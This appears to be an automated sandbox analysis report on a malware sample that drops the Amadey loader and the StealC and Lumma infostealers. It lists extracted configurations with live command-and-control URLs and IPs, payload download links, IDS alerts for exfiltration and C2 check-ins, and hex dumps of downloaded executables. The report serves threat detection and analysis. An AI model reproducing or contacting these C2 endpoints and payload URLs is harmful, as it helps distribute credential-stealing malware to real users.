                                Source: 00000005.00000002.2955176966.0000000000DA1000.00000040.00000001.01000000.00000007.sdmpMalware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
                                Source: 44.2.num.exe.b80000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                                Source: https://bathdoomgaz.store:443/apiVirustotal: Detection: 13%Perma Link
                                Source: http://185.215.113.103/luma/random.exeVirustotal: Detection: 20%Perma Link
                                Source: http://185.215.113.103/test/num.exeVirustotal: Detection: 25%Perma Link
                                Source: http://185.215.113.43/Zu7JuNko/index.phpVirustotal: Detection: 17%Perma Link
                                Source: http://185.215.113.37/e2b1563c6670f193.phpuVirustotal: Detection: 16%Perma Link
                                Source: http://185.215.113.43/Zu7JuNko/index.phpncodedVirustotal: Detection: 12%Perma Link
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exeReversingLabs: Detection: 28%
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exeReversingLabs: Detection: 82%
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeReversingLabs: Detection: 82%
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeReversingLabs: Detection: 28%
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeReversingLabs: Detection: 52%
                                Source: 8ObkdHP9Hq.exeReversingLabs: Detection: 52%
                                Source: 8ObkdHP9Hq.exeVirustotal: Detection: 56%Perma Link
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\num[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000349001\9d7da53f74.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exeJoe Sandbox ML: detected
                                Source: 8ObkdHP9Hq.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,20_2_00B8C820
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B98EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,20_2_00B98EA0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B89AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,20_2_00B89AC0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B87240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,20_2_00B87240
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B89B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,20_2_00B89B60
                                Source: 8ObkdHP9Hq.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49730 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49737 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 13.107.246.45:443 -> 192.168.2.4:49792 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49893 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49900 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61026 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61043 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.4:61176 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 23.199.218.33:443 -> 192.168.2.4:61189 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 104.21.53.8:443 -> 192.168.2.4:61190 version: TLS 1.2
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,6_2_00B8DBBE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B968EE FindFirstFileW,FindClose,6_2_00B968EE
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,6_2_00B9698F
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00B8D076
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00B8D3A9
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00B99642
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00B9979D
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,6_2_00B99B2B
                                Source: C:\Users\user\AppData\Local\Temp\1000332001\84d280a9e8.exeCode function: 6_2_00B95C97 FindFirstFileW,FindNextFileW,FindClose,6_2_00B95C97
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B938B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,20_2_00B938B0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,20_2_00B8E430
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,20_2_00B8ED20
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B94910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B94910
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B94570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,20_2_00B94570
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B8F6B0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B93EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,20_2_00B93EA0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,20_2_00B8DA80
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B816D0
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,20_2_00B8DE10
                                Source: C:\Users\user\AppData\Local\Temp\1000336001\num.exeCode function: 20_2_00B8BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,20_2_00B8BE70

                                Networking

                                barindex
                                Source: Network trafficSuricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49788 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49804
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49836 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49872 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49854 -> 185.215.113.37:80
                                Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:60282 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:65496 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:49186 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:50272 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:62676 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:53746 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:51433 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:55038 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:61038 -> 185.215.113.43:80
                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:61131 -> 185.215.113.37:80
                                Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:51649 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:52889 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:56170 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:51058 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:58735 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056485 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mobbipenju .store) : 192.168.2.4:56028 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:49932 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056471 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (clearancek .site) : 192.168.2.4:62159 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056473 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (licendfilteo .site) : 192.168.2.4:63468 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:63294 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056481 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (dissapoiznw .store) : 192.168.2.4:56035 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056483 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (eaglepawnoy .store) : 192.168.2.4:63822 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:54310 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056475 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spirittunek .store) : 192.168.2.4:63695 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056479 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (studennotediw .store) : 192.168.2.4:50984 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2056477 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bathdoomgaz .store) : 192.168.2.4:49352 -> 1.1.1.1:53
                                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:61184 -> 185.215.113.37:80
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:61043 -> 104.21.53.8:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:61043 -> 104.21.53.8:443
                                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:61190 -> 104.21.53.8:443
                                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:61190 -> 104.21.53.8:443
                                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                                Source: Malware configuration extractorIPs: 185.215.113.43
                                Source: global trafficTCP traffic: 192.168.2.4:61010 -> 1.1.1.1:53
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 01:11:45 GMTETag: "e0600-623d8b459b4e3"Accept-Ranges: bytesContent-Length: 919040Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 49 35 03 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 56 04 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 60 0e 00 00 04 00 00 a3 56 0e 00 02 00 40 80 00 00 40 00 00 10 00 00 00 00 40 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 8e 0c 00 7c 01 00 00 00 40 0d 00 b8 9b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 0d 00 94 75 00 00 f0 0f 0b 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 34 0c 00 18 00 00 00 10 10 0b 00 40 00 00 00 00 00 00 00 00 00 00 00 00 c0 09 00 94 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1d ab 09 00 00 10 00 00 00 ac 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 82 fb 02 00 00 c0 09 00 00 fc 02 00 00 b0 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 6c 70 00 00 00 c0 0c 00 00 48 00 00 00 ac 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b8 9b 00 00 00 40 0d 00 00 9c 00 00 00 f4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 94 75 00 00 00 e0 0d 00 00 76 00 00 00 90 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:14 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 29 Sep 2024 08:19:54 GMTETag: "4cc00-6233dc0bf3e80"Accept-Ranges: bytesContent-Length: 314368Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 bd cf 9d 43 f9 ae f3 10 f9 ae f3 10 f9 ae f3 10 96 d8 58 10 e1 ae f3 10 96 d8 6d 10 f4 ae f3 10 96 d8 59 10 c0 ae f3 10 f0 d6 70 10 fa ae f3 10 79 d7 f2 11 fb ae f3 10 f0 d6 60 10 fe ae f3 10 f9 ae f2 10 97 ae f3 10 96 d8 5c 10 eb ae f3 10 96 d8 6e 10 f8 ae f3 10 52 69 63 68 f9 ae f3 10 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4a 9a f9 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 ce 01 00 00 1a 24 00 00 00 00 00 f0 69 01 00 00 10 00 00 00 e0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 10 26 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 aa 02 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 25 00 e0 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 04 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8f cc 01 00 00 10 00 00 00 ce 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e0 2e 72 64 61 74 61 00 00 8c cf 00 00 00 e0 01 00 00 d0 00 00 00 d2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 03 23 00 00 b0 02 00 00 e4 01 00 00 a2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 9e 45 00 00 00 c0 25 00 00 46 00 00 00 86 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 07 Oct 2024 01:23:18 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 07 Oct 2024 00:46:48 GMTETag: "1bea00-623d85b170f6f"Accept-Ranges: bytesContent-Length: 1829376Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 4a f1 ff 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 a0 04 00 00 dc 00 00 00 00 00 00 00 20 49 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 50 49 00 00 04 00 00 19 15 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 f0 05 00 6b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 f1 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 d0 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 e0 05 00 00 00 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 f0 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 c0 29 00 00 00 06 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6b 61 77 6a 6e 79 6d 76 00 50 19 00 00 c0 2f 00 00 50 19 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6c 64 6b 6c 72 66 69 76 00 10 00 00 00 10 49 00 00 06 00 00 00 c2 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 20 49 00 00 22 00 00 00 c8 1b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 